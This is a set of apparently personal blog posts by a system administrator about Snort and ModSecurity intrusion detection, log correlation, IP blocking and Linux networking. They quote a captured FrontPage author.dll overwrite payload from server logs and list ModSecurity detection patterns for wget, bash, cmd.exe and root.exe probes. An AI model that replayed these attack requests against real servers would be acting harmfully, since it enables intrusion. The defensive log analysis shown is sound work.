The conversation dies shortly thereafter. I do think SiegeX was thinking in a sane manner. What he's worried about is someone either breaking into the machine or someone from inside tunneling and somehow letting an unauthorized user into the network. Layered security addresses both of those concerns. You lock down your firewall to only allow certain traffic in/out of the network. You set up either an IDS or an IPS to either log suspicious traffic or actively log and block unusual traffic. Yes, IDS/IPS can detect layer-7 traffic anomalies (but only if there are rules patterned after the unwanted traffic). Those people that tunnel out of the corporate network can be either reprimanded or handed their walking papers...that problem can be solved rather quickly.

I take it that SiegeX didn't want to deal with traffic analysis. That's the only way ANYONE is going to see stuff. Think about it. When you look at firewall logs, you're looking at logged traffic. If you're looking at your system logs (for instance, /var/log/secure, /var/log/faillog, or /var/log/messages (which may contain snort log and/or firewall log entries)), you're pretty much conducting traffic analysis. This should be within the realm of every system admin.

The easier way would be to address the kernel vulnerability, but I've also seen places that will NOT update a kernel unless absolutely necessary. The train-of-thought is that they wanted absolute stability and that stability overruled patch updating. What type of organization would think in this manner? Think of organizations that deal in national flight systems.

So, when am I going to apply a patched kernel? I don't know...my LAN is so layered with security that its not a hot priority for me to apply this patch.

Lastly, here's a Secunia link of the vulnerabilities in question: http://secunia.com/advisories/28835/

Mystery infestation strikes Linux/Apache Web sites

2008-01-25T08:46:00.000-05:00

http://www.linux.com/feature/125548

"According to a press release issued earlier this month by Finjan, a security research firm, compromised Web servers are infecting thousands of visitors daily with malware that turns their Windows machines into unwitting bots to do the bidding of an as yet unidentified criminal organization. Security firms ScanSafe and SecureWorks have since added their own takes on the situation, though with varying estimates on the number of sites affected. All reports thus far say the compromised servers are running Linux and Apache."

What's New?

2008-01-21T19:09:00.001-05:00

What's new for 2008?

I've quit smoking. The last time I smoked was on the 31st of Dec 2007. I've also enrolled in my company's benefits as a non-smoker (as an incentive and as punishment, as a smoker who has claimed non-smoker status can be disciplined or fired). I've been using smoking cessation aids (ie, Nicoderm and other aids).

Other than that, nothing is new, other than I'm burned out at work. Shiftwork and looking at packets all day (along with customer firewall requests and the semi-management stuff I do) has taken its toll, so my resume is out there and I've gotten some interesting hits. Sadly, most of
it is contract work (which sucks) or requires a clearance (my clearance status is still in some black hole somewhere). Soooo...I'm applying within the company for other positions of interest. I'd like to stay in my field and have completed one assessment 'test'...it blew my mind, along with it being like 60 questions long, essay format. The things I do to get a freekin' job... :)

Anyways, I've a tidbit for you. If anyone has ever perused their web server logs and saw the below:

193.205.4.38 - - [19/Jan/2008:16:31:56 -0500] "HEAD / HTTP/1.0" 200 0
193.205.4.38 - - [19/Jan/2008:16:31:56 -0500] "HEAD / HTTP/1.0" 200 0 "-" "-"
193.205.4.38 - - [19/Jan/2008:16:31:56 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 500 544
193.205.4.38 - - [19/Jan/2008:16:31:56 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 500 544 "-" "core-project/1.0"

It looks harmless, eh? Seen this tons of times before? I know I have. Well, take a look at how my Snort setup detected it:

WEB-MISC cross site scripting attempt 1 1 2008-01-19 16:31:56 2008-01-19 16:31:56

Digging deeper:

[ GAAAHHH...the code renders like pure dung when I post! ]

Note that I've disabled the harmful HTML flags and Snort removed the garbage (noted as non-ASCII characters).

And, no, I don't allow any inputting of text on my site, and I also don't allow any scripts to be run. My site is a static site, so I'm safe enough, along with using modsecurity and Snort for blocking of HTTP traffic and detection of badness. I refuse to be a statistic, although my stubbornness limits dynamic content serving.

The script looks like it checked for a live webserver then began the attack, quick-fast. Most people will associate the Frontpage attack as an old attack. The payload of the Frontpage attacks show:

method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dindex.htm%3bmeta%5finfo%3d%5b%5d%5d&put%5foption=overwrite&comment=&keep%5fchecked%5fout=false

I will not pretend I know what all it does. It is attempting to inject data into my server, though. The red flag for me is the 'method=put+document'. Also, there were two of these, happening 24 hours apart (but only one cross-site scripting event). I'll not block the site, as I may actually learn something from recording its attacks (and I can't block the whole internet, either).

Another host to block

2008-01-12T16:54:00.000-05:00

I've just blocked 202.75.33.249. I haven't been paying heed to my Dshield reports and when I compared two reports today, I saw the same IP generating many hits. I checked the firewall logs and processed how many alerts this IP has generated. I found that the attacks began Nov 18th and the total number of alerts are 863.

This IP was a prime candidate for blocking.

Why don't I use Snort-inline? Because I don't have that much control over the network that my host is on (its a colo box running on a virtual server). So, I have to do things manually...it's not a problem, as it keeps me on my toes.

EDIT - I actually blocked 3 other IPs also. What's funny is that I saw one that was trying to connect on port 3389 (MS Term Svcs)...to a Linux machine...

e-GeForce 7300 GT fan issues

2007-12-21T20:35:00.000-05:00

The fan on this card, which I purchased last March, seized. It appears to be removable. Instead of returning it, I'm going to see about adding another fan (I just need to find one that will clamp on without issues).

I ordered another one eariler in the week and will use this one while I'm repairing the other's fan (in fact, I'll order an additional fan for when the new one's fan breaks).

Why am I putting up with replacing the fan and buying an additional fan for the new one? Because the card is AWESOME! The fan issue totally sucks and the card is still under warranty, but I can tell that these cards have bad fans and this is a design defect, I believe. If I can replace the fan with one that clamps on at the same clamp-on points, I'll be happy. If not, I'll return both before the warranties end and get the fanless versions.

Click here for some TigerDirect reviews of this card.

EDIT: WHOA... I just opened the box of my replacement 7300 and saw that they've changed the fan to something that is hopefully more robust. It is an open fan and is black plastic. EVGA must have had too many complaints and decided that a new fan was in order. I'll post pics later.

Modsecurity again

2007-12-19T21:08:00.000-05:00

Reading through some of my unread modsecurity mailing list emails, I found this tidbit (pretty simple, actually):

egrep '^Message:' modsec_audit.log | sort | uniq -c | sort -rn

I edited it to read: egrep 'message:' audit_log | sort | uniq -c | sort -rn

I see the following after running those commands:

927 mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev "2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
728 mod_security-message: Access denied with code 403. Pattern match "cmd.txt" at REQUEST_URI [id "1005"][rev "2"] [msg "cmd.txt usage, suspicious activity"] [severity "ALERT"]
668 mod_security-message: Warning. Pattern match "/robots\\.txt" at THE_REQUEST [severity "EMERGENCY"]
377 mod_security-message: Warning. Pattern match "/*\\.shtml" at THE_REQUEST [severity "EMERGENCY"]
171 mod_security-message: Access denied with code 500. Pattern match "\\?\\?\\?\\?\\?\\?\\?\\?\\?\\?" at THE_REQUEST [severity "EMERGENCY"]
141 mod_security-message: Access denied with code 403. Pattern match "/xmlrpc.php" at REQUEST_URI [id "1003"][rev "2"] [msg "lupper-type attack attempt"] [severity "CRITICAL"]
127 mod_security-message: Warning. Pattern match "/\\?M=D" at THE_REQUEST [severity "EMERGENCY"]
127 mod_security-message: Access denied with code 403. Pattern match "index2.php" at REQUEST_URI [id "1005"][rev "2"] [msg "index2.php usage, suspicious activity"] [severity "ALERT"]
115 mod_security-message: Access denied with code 500. Pattern match "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data;)" at HEADER("Content-Type") [severity "EMERGENCY"]
82 mod_security-message: Access denied with code 403. Pattern match "adxmlrpc.php" at REQUEST_URI [id "1004"][rev "2"] [msg "lupper-type attack attempt"] [severity "CRITICAL"]
51 mod_security-message: Access denied with code 403. Pattern match "login.php" at REQUEST_URI [id "1005"][rev "2"] [msg "login.php usage, un-kosher activity"] [severity "ALERT"]
48 mod_security-message: Access denied with code 500. Pattern match "\\." at REQUEST_URI [severity "EMERGENCY"]
29 mod_security-message: Access denied with code 500. Pattern match "\\.\\." at THE_REQUEST [severity "EMERGENCY"]
12 mod_security-message: Access denied with code 500. Error normalising REQUEST_URI: Invalid character detected [0] [severity "EMERGENCY"]
8 mod_security-message: Access denied with code 403. Pattern match "index.php" at POST_PAYLOAD [id "1005"][rev "2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
7 mod_security-message: Access denied with code 500. Pattern match "/calendar" at THE_REQUEST [severity "EMERGENCY"]
5 mod_security-message: Warning. Pattern match "/bash" at THE_REQUEST [severity "EMERGENCY"]
4 mod_security-message: Access denied with code 500. Pattern match "wget\\x20" at REQUEST_URI [severity "EMERGENCY"]
2 mod_security-message: Access denied with code 500. Pattern match "\\?&" at THE_REQUEST [severity "EMERGENCY"]
2 mod_security-message: Access denied with code 500. Pattern match "/root\\.exe" at THE_REQUEST [severity "EMERGENCY"]
1 mod_security-message: Access denied with code 403. Pattern match "/cmd.exe" at REQUEST_URI [id "1002"][rev "2"] [msg "codered/nimda attack attempt"] [severity "ALERT"]

The logs go back to May of 2007.

I did the same for my snort logs:

egrep 'Classification:' alert | sort | uniq -c | sort -rn

14441 [Classification: Misc activity] [Priority: 3]
1892 [Classification: Web Application Attack] [Priority: 1]
1857 [Classification: Attempted Information Leak] [Priority: 2]
1613 [Classification: Misc Attack] [Priority: 2]
1147 [Classification: access to a potentially vulnerable web application] [Priority: 2]
442 [Classification: Executable code was detected] [Priority: 1]
7 [Classification: Potentially Bad Traffic] [Priority: 2]
3 [Classification: Attempted User Privilege Gain] [Priority: 1]
3 [Classification: Attempted Denial of Service] [Priority: 2]
2 [Classification: Detection of a Network Scan] [Priority: 3]
1 [Classification: Attempted Administrator Privilege Gain] [Priority: 1]

This Snort log is 7.4M in size.

Pretty cool, eh? I thought it would be cool to share this!

WPA and Slackware (or in this case, Backtrack)

2007-11-23T11:50:00.000-05:00

I've got Slackware (OK, actually Backtrack...the differences between the two are subtle but defined pretty well and is a discussion for another day) running wpa_supplicant. In the last week, I've seen several people complaining on the lack of documentation on how to get this running. Another issue that isn't well-documented is the fact that Slackware has no GUI that'll allow the user to switch wireless networks as quickly as possible. My only answer is to use Slackware's KDE-based wifi management tool.

I've used ndiswrapper with a closed-source card on a Toshiba Satellite 1805-S274, in this case.

Anyways, I'm going to attempt to describe how I use wpa-supplicant. My wifi setup uses a PCMCIA card (Linksys WPC54GS) in which I have to use win32 drivers (via ndiswrapper). I created a script in the root directory: wlan_script2.sh.

#!/usr/bin/bash

#Start of script

wpa_supplicant -ieth1 -c/etc/wpa_supplicant.conf -dP -Dndiswrapper -B

dhcpcd -d -t 10 eth1

#End of script

I've also added the following to the bottom of the /etc/wpa_supplicant.conf file:

network={
ssid="youarebeingwatched2"
proto=WPA
key_mgmt=WPA-PSK
psk="There are a lot of steps to this document and the process should be simplified!"
priority=99
}

I usually run the first script above, then the second. I'm then instantly connected without trouble:

bt ~ # ./wlan_script2.sh
Initializing interface 'eth1' conf '/etc/wpa_supplicant.conf' driver 'default' ctrl_interface 'N/A'
bridge 'N/A'
Configuration file '/etc/wpa_supplicant.conf' -> '/etc/wpa_supplicant.conf'
Reading configuration file '/etc/wpa_supplicant.conf'
ctrl_interface='/var/run/wpa_supplicant'
ctrl_interface_group='wheel' (DEPRECATED)
eapol_version=1
ap_scan=1
fast_reauth=1
Priority group 99
id=0 ssid='youarebeingwatched2'
Initializing interface (2) 'eth1'
EAPOL: SUPP_PAE entering state DISCONNECTED
EAPOL: KEY_RX entering state NO_KEY_RECEIVE
EAPOL: SUPP_BE entering state INITIALIZE
EAP: EAP entering state DISABLED
EAPOL: External notification - portEnabled=0
EAPOL: External notification - portValid=0
SIOCGIWRANGE: WE(compiled)=21 WE(source)=18 enc_capa=0xf
capabilities: key_mgmt 0xf enc 0xf
WEXT: Operstate: linkmode=1, operstate=5
Own MAC address: 00:0f:66:4a:42:6a
wpa_driver_wext_set_wpa
wpa_driver_wext_set_key: alg=0 key_idx=0 set_tx=0 seq_len=0 key_len=0
wpa_driver_wext_set_key: alg=0 key_idx=1 set_tx=0 seq_len=0 key_len=0
wpa_driver_wext_set_key: alg=0 key_idx=2 set_tx=0 seq_len=0 key_len=0
wpa_driver_wext_set_key: alg=0 key_idx=3 set_tx=0 seq_len=0 key_len=0
wpa_driver_wext_set_countermeasures
wpa_driver_wext_set_drop_unencrypted
Setting scan request: 0 sec 100000 usec
Using existing control interface directory.
ctrl_interface_group=10 (from group name 'wheel')
Added interface eth1
Daemonize..
dhcpcd: MAC address = 00:0f:66:4a:42:6a
dhcpcd: your IP address = 10.150.1.109

Now, this is a cheap hack and this can be done using the existing Slackware scripts, most likely...it was quicker for me to script this on my own and get internet connectivity up and running quickly. Besides that, I'm OK using this hack. Usually I just turn on the laptop, plug in the wireless PCMCIA adapter (Linksys WPC54GS), run the scripts, and commence to browse!

Any of you got any wireless hacks?

A Good Read: Snort for Dummies

2007-11-23T00:51:00.000-05:00

Don't laugh. I bought this book a long time ago so that I could understand some things about Snort that were described in other expensive books that I didn't understand. Somtimes, very basic explanations in a non-technical jargon is best and every little bit of understanding helps, right? Here's the link: Snort for Dummies

58 Cool Hacks...and more

2007-11-18T21:18:00.000-05:00

Here are fifty-eight (58) cool hacks that are posted on the Linux Format Wiki. Some of these are actually cool and insightful. I plan on attemtping to regularly use a few of them. I'll let you know a bit later which ones they are and how well my implementation and usage goes.

Here is another good link. It describes in detail how to build your own distribution (build, not create, as you will build from a pre-existing Linux ISO file). If I'd enough time to do this, I would...maybe during my next holiday, I'll begin this, with the idea of making a seriously light yet secure distro.

This one is a good one, but I've only skimmed it so far. It is LinuxFormat's Slackware documentation. Since I know they are a bit biased in their views of Slackware (they seem to think that apt-get-like package management is a requirement and that the distribution is a bit 'behind the times'), I know I need to read this part of their wiki with some attention to detail.

Web server being scanned

2007-11-10T14:04:00.001-05:00

Hrmm...I've found that my web server is being slowly scanned. This scan looks to be attempting to do a 'low and slow' scan, attempting to circumvent any monitoring thresholds. In fact, I noticed the scans a few days ago and just added the IP to my firewall block list.

Here's what I've seen so far:

DShield
myNetWatchman
Web Sniffer Proxy

Both of those links just show a few of my firewall entries. I give feeds of my logs to several organizations to assist in monitoring internet-wide attacks and trending.

My Snort logs show a different story (IDS logs always do, when comparing to firewall logs). What I'm seeing are SNMP-type scans, which are probably NMAP scans. What's weird is that the scans originate from IP 67.15.135.144:80. Visiting that page with http://web-sniffer.net, I see an unconfigured/new server account:

         class="welcomeText">Server Default page
class="descriptionText">
       If you see this page it means:

       1. hosting for this domain is not configured

       or

       2. there's no such domain registered in Plesk

The above is usually an indicator of badness...it appears that someone may have purposely stood up this account to use to maliciously. All they need is a running web server, and the fact that I'm seeing what I am is an indication that the web server is up and running (I also got an HTTP status code of '200').

I'll keep monitoring this activity, although the activity is fully blocked (the whole network range is blocked).

Slack v12.0 on a old rackmount

2007-11-04T00:11:00.000-04:00

My Dell Precision 220 that I had NetBSD installed on has a CPU fan that is dying (bearing failure which is pretty damn noisy). I've turned off the machine but needed a temporary replacement, so I took an old rackmount (no-name brand that was pretty much hand-built) and installed Slackware v12.0 on it. It was previously running Astaro Linux but I needed something that had a bunch of installed NICs. This machine has 4 NICs. I need three of them, one for the management interface and two for connections to an ethernet tap (I'm sniffing traffic before my firewall).

I'd thought this would be a huge exercise in hunting down how to bind the two interfaces that were plugged into the tap ports of the tap, but it was easier than in NetBSD.

After installing Slackware v12.0 and then Snort (2.6.1.5), I then used 'brctl' to establish an ethernet bridge across two different physical interfaces:

root@suna:~# brctl
Usage: brctl [commands]
commands:
addbr add bridge
delbr delete bridge
addif add interface to bridge
delif delete interface from bridge
setageing set ageing time
setbridgeprio set bridge priority
setfd set bridge forward delay
sethello set hello time
setmaxage set max message age
setpathcost set path cost
setportprio set port priority
show show a list of bridges
showmacs show a list of mac addrs
showstp show bridge stp info
stp {on|off} turn stp on/off
root@suna:~#
root@suna:~# brctl addbr br0
root@suna:~#
root@suna:~#
root@suna:~# ifconfig br0
br0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

root@suna:~# ifconfig eth2 up
root@suna:~# ifconfig eth3 up
root@suna:~# brctl addif br0 eth2
root@suna:~# brctl addif br0 eth3
root@suna:~# ifconfig br0 up
root@suna:~# tcpdump -ivv br0
tcpdump: SIOCGIFHWADDR: No such device
root@suna:~# tcpdump -vvi br0
tcpdump: WARNING: br0: no IPv4 address assigned
tcpdump: listening on br0, link-type EN10MB (Ethernet), capture size 96 bytes
23:44:41.166720 IP (tos 0x0, ttl 54, id 47678, offset 0, flags [DF], proto: TCP (6), length: 129) 64.161.255.20.ircd > pool-71-178-10-160.washdc.fios.verizon.net.49197: P 692786612:692786689(77) ack 97899523 win 98
23:44:41.167554 IP (tos 0x0, ttl 63, id 17743, offset 0, flags [DF], proto: TCP (6), length: 52) pool-71-178-10-160.washdc.fios.verizon.net.49197 > 64.161.255.20.ircd: ., cksum 0x501f (correct), 1:1(0) ack 77 win 1002
23:44:41.175972 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 72) pool-71-178-10-160.washdc.fios.verizon.net.1024 > nsrest01.verizon.net.domain: [udp sum ok] 19732+ PTR? 20.255.161.64.in-addr.arpa. (44)
23:44:41.481742 IP (tos 0x0, ttl 249, id 47959, offset 0, flags [DF], proto: UDP (17), length: 123) nsrest01.verizon.net.domain > pool-71-178-10-160.washdc.fios.verizon.net.1024: 19732 NXDomain q: PTR? 20.255.161.64.in-addr.arpa. 0/1/0 ns: 255.161.64.in-addr.arpa. (95)

4 packets captured
4 packets received by filter
0 packets dropped by kernel
root@suna:~# ifconfig br0
br0 Link encap:Ethernet HWaddr 00:D0:B7:85:78:D6
inet6 addr: fe80::2d0:b7ff:fe85:78d6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:13 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1108 (1.0 KiB) TX bytes:468 (468.0 b)

After setting up the br0 interface, I could then use Snort to sniff the br0 device (and see the traffic of the interfaces bridged to br0):

root@suna:~# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.00d0b78578d6 no eth2
eth3
root@suna:~# ifconfig eth2
eth2 Link encap:Ethernet HWaddr 00:D0:B7:85:78:D6
inet6 addr: fe80::2d0:b7ff:fe85:78d6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49363 errors:0 dropped:0 overruns:0 frame:0
TX packets:41805 errors:0 dropped:0 overruns:0 carrier:10
collisions:1202 txqueuelen:1000
RX bytes:41520086 (39.5 MiB) TX bytes:5730882 (5.4 MiB)
Interrupt:5

root@suna:~# ifconfig eth3
eth3 Link encap:Ethernet HWaddr 00:D0:B7:85:8A:B4
inet6 addr: fe80::2d0:b7ff:fe85:8ab4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:41860 errors:0 dropped:0 overruns:0 frame:0
TX packets:49312 errors:0 dropped:0 overruns:0 carrier:940
collisions:959 txqueuelen:1000
RX bytes:5771456 (5.5 MiB) TX bytes:41483624 (39.5 MiB)
Interrupt:10

root@suna:~# ethtool eth2
Settings for eth2:
Supported ports: [ TP MII ]
Supported link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
Supports auto-negotiation: Yes
Advertised link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
Advertised auto-negotiation: Yes
Speed: 100Mb/s
Duplex: Half
Port: MII
PHYAD: 1
Transceiver: internal
Auto-negotiation: on
Current message level: 0x000020c1 (8385)
Link detected: yes

root@suna:~# ethtool eth3
Settings for eth3:
Supported ports: [ TP MII ]
Supported link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
Supports auto-negotiation: Yes
Advertised link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
Advertised auto-negotiation: Yes
Speed: 100Mb/s
Duplex: Half
Port: MII
PHYAD: 1
Transceiver: internal
Auto-negotiation: on
Current message level: 0x000020c1 (8385)
Link detected: yes
root@suna:~#

At this point, it can get snort to run, but it dies not long after starting the process. I can also use tcpdump to sniff traffic from the br0 device. I'm seeing normal traffic. There's nothing in the logs to indicate any problems. I'm also able to telnet to port 3306 (Snort is reporting events/alerts to a database). I've also tested my snort.conf and it appears sane (no reported errors) and will connect to the MySQL database without errors.

Hrmmm...looks like it will be a busy weekend...

Edit - 11/10/2007:

I had to revert to Snort v2.4.4 for now, as v2.6.1.5 was causing serious memory issues. Using the -M switch, Snort wasn't telling me why it was dying. 'dmesg' or cat'ing the /var/log/messages file wasn't showing why it was dying either. The only hint was me watching the process via 'top'. Within 5 min, the process would hog all 512MB of physical RAM and commence to using all virtual RAM (1GB). The process would die less than an hour after start. I began trimming the snort.conf file to lessen memory usage, but began to tire of doing this. I decided to fall back a version until I could figure out why v2.6 wasn't working.

Updated Modsecurity rules by converting Snort rules

2007-10-08T21:21:00.000-04:00

Using the tool shown here, I was able to convert the latest snort rules into Modsecurity rules!

Previous to this, I'd created my own (crude) rules that blocked most of the traffic I had concerns about, but I wanted something more. I converted the latest Snort rules to Modsecurity rules, ending up with 852 new Modsecurity rules (12 of which I created).

This is already paying off. I'm seeing a good bit of rejected or warning-type (but passing) traffic. Also, the web rejections are actually triggering Snort alerts (attack responses), which is great, as it gives me more data to investigate when perusing my Snort logs.

I also had issues with maybe 7 of the converted rules. I've yet to look at why they wouldn't work without Apache erroring out, but I've disabled them. I'll take a look at them sometime soon.

`

Snort/BASE and Analytics

2007-10-08T17:46:00.000-04:00

This post is not related to Slackware, but will cover a method of utilizing BASE to conduct analysis. I'm including screenshots of my BASE setup when conducting analysis to describe how I utilize BASE and correlate logged activity. The below is NOT the only methods of conducting analytics with BASE. This method works for me and offers me quick results. In fact, if you've other methods, please post or e-mail me so that I can know different ways of using this SEM.

If you're not familiar with BASE, please visit the project's site. BASE is a browser-based console that presents intrusion detection logs in various readable formats.

Here is a screenshot of the root page:

Within the upper left-hand corner (within the blue field), there are what I call "canned queries", that will allow you to see certain subsets of data. The ones that I focus on the most are

- Today's alerts
- Last 24 Hours alerts
- Last 72 Hours alerts
- Most recent 15 Alerts
- Most recent 15 Unique Alerts
- Most frequent 5 Unique Alerts

Out of those, I focus on "Last 72 Hours alerts" most frequently.

Let us delve into the last 72 hours' events. Note in the image that I've circled this link. Please either follow along if you've BASE installed, or follow this diatribe and its image links. Either click the circled link or open it in a new tab or browser. I tend to open BASE links in a new browser instance, as it gives me a separate area to dig into a new investigation. This way, if I've several concerns, I've a browser window for each.

After clicking the 72-hour link, you should see something similar to below:

I've split the browser window into two pages, since the alerts scroll down the page. For this exercise, we're going to focus on the second image, specifically the "WEB-PHP remote include path" events (toward the bottom). I chose these events because I wanted a good example of how to correlate events per IP. Click on this link (circled in RED) or open the link in a new browser/tab. You may see something similar to the following browser window:

In this example, 37 alerts are showing, with various source IPs (or what I call SIPs) and, in this case, one destination IP (what I call a DIP). Note that there could be more than one DIP, such as when you've two web servers or two IPs that are sharing a NIC. In the above browser window, I've a few IPs apparently attacking my web server. How do I make it so I see one line per SIP yet get enough situational awareness that I have an idea of which SIP generated what number of alerts on a DIP? The "Unique IP Links" in the upper right corner (circled in RED). Click on that link and you should see something similar to the following:

What's changed? The traffic is now matched based on unique traffic. Let's focus on "90-179-94.adsl.cust.tie.cl/200.90.179.94". This IP shows as a source and destination IP. Why? Because the IDS sensor logged both the web server's sending and receiving traffic (bi-directional). Note that this only happens when a response signature triggers (we'll see this in the next screenshot). If the web server response does not trigger a signature, the IDS won't log an alert. This is where signature tuning comes in handy...you really don't want to see legitimate HTTP 202 (OK) traffic being logged unless absolutely necessary. You only want concerning traffic to be logged. Now, note the brackets (sloppy) in RED in the above right screenshot. I'm going to click the 200.90.179.94 IP because I want to know what's going on there. I also observed this IP in the lower half of the screen (not screenshotted for brevity) alerting on my other IP (the NIC is dual-homed). Click on the IP and you'll see something similar:

You can study this page for a moment, but its just a page to gain a further understanding of who owns the IP. The real resources on this page are circled in RED. We'll click on both, starting with "Source/Destination", then "Unique Alerts". Open them in separate windows so you can compare. While both may show similar alerts, each is valuable:

The view on the left shows every unique attack and attack response regarding the attacking IP. The view on the right shows a summary of the attacks, with a description of "4 unique alerts detected among 16 alerts on 200.90.179.94/32". The right view also shows that you can dig down into each category of alert, if you chose.

Which view do I rely on? For a quick view, I usually use the right screenshot, but I also use the left screenshot method for when I want to see everything the attacking IP did (and how my server responded). Note that I didn't obfuscate the whole of my server's IP. I wanted to show an example of this method of analysis showing EVERYTHING the attacker did, including reaching out to both of my IPs.

I'm not going to go further. I just wanted to highlight how BASE can be used efficiently. Anything further would get into payload analysis, which is beyond the scope of today's post.

Stay tuned for a possible swf2vnc movie capture of using BASE. This will happen as soon as I can figure out how to mask my public IPs. This task may get me to delve into using my Macs to edit the SWF movies (we'll see if that is possible, with free- or shareware).

Log Correlation

2007-09-15T23:23:00.000-04:00

I thought I'd talk about the importance of log correlation. For instance, you've found that someone is continually pinging your server. You want to see if your box is responding to the pings. Usually, you'll know right off, since most people know if their firewall was configured to block pings...I'm just using pings as a quick example, though. Log correlation usually consists of checking, for instance, web server logs against firewall logs, or Snort logs against firewall and web server logs. This helps you understand what suspicious activity is actually doing and if your server/workstation responded (and how it responded, if it did).

I run Snort on a server, along with a web server, which is firewalled with IPTables. I have Snort report what it sees to a MySQL database, although it does record captures to a PCAP file locally. I also run Modsecurity, an application firewall that is designed to sniff and possibly block traffic going to/from web servers, mainly Apache. So, I've a ton of logs that I can correlate: Snort, Apache, IPTables, and Modsecurity logs.

We'll pick something easy. In fact, I'll fabricate some logs by generating some false alerts. I'll use 'wget', to visit my website. Keep in mind that what you see below gives you the advantage...you know what you're doing and looking for when we soon check the logs. This won't be the case when some stranger or worm hits your firewall or web server (or any other application server).

-bash-2.05b$ wget wigglit.ath.cx/root.exe
--23:24:05-- http://wigglit.ath.cx/root.exe
=> `root.exe'
Resolving wigglit.ath.cx... 66.160.141.30
Connecting to wigglit.ath.cx|66.160.141.30|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
23:24:06 ERROR 404: Not Found.

-bash-2.05b$

I used root.exe because there is an old vulnerability was was used to exploit the CodeRed worm of old. Now, let's check the web server's logs. I've tail'd my logs:

root@starchild:/var/log/apache# tail -f -n 100 access_log
12.123.12.123 - - [15/Sep/2007:23:34:35 -0400] "GET /root.exe HTTP/1.0" 404 202
12.123.12.123 - - [15/Sep/2007:23:34:35 -0400] "GET /root.exe HTTP/1.0" 404 202 "-" "Wget/1.10.2"

You see that the communcation was rejected (404 code), as the traffic was deemed forbidden by the web server. This is usually a good indication, as the server didn't respond favorably to the attack.

Now, let us check the firewall logs. We already know that the firewall allowed the traffic, since the web server responded with a 404...if the traffic was being blocked, there would be no record of the attack in the logs, because the firewall would have intercepted the traffic before it reached the web server. We're checking the firewall logs just to be sure this guy hasn't done anything else that the web server didn't see:

Sep 12 17:28:34 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=34557 DF PROTO=TCP SPT=46656 DPT=10083 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:28:44 starchild kernel: Connection attempt (PRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=18168 DF PROTO=TCP SPT=40091 DPT=449 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:28:44 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=27053 DF PROTO=TCP SPT=36295 DPT=5060 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:28:54 starchild kernel: Connection attempt (PRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=29291 DF PROTO=TCP SPT=47590 DPT=342 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:28:54 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=11788 DF PROTO=TCP SPT=43604 DPT=1519 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:29:04 starchild kernel: Connection attempt (PRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=17600 DF PROTO=TCP SPT=32783 DPT=577 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:29:04 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=51338 DF PROTO=TCP SPT=47879 DPT=18187 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:29:14 starchild kernel: Connection attempt (PRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=58520 DF PROTO=TCP SPT=41983 DPT=517 WINDOW=5840 RES=0x00 SYN URGP=0
